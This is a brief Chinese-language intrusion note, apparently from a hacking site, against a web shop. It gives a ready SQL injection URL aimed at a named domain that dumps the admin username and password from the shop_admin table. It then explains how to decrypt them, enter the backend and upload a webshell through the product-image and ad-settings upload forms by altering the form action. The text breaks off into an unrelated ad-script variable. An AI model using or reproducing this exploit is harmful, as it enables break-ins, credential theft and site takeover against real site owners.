作者: JcBolg,利用: http://www.xiaoweio.cn/wyshop/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin 拿到用户名和密码,解密,进入后台,找上传点,存在着上传漏洞,直接拿shell。进入后台,商品管理-商品添加-上传小图片,(广告管理-广告设置这里也有个上传点)在弹出的窗口中,查看源码,在action前面直接添加网站域名,并在后面: var cpro_id = "u6885494";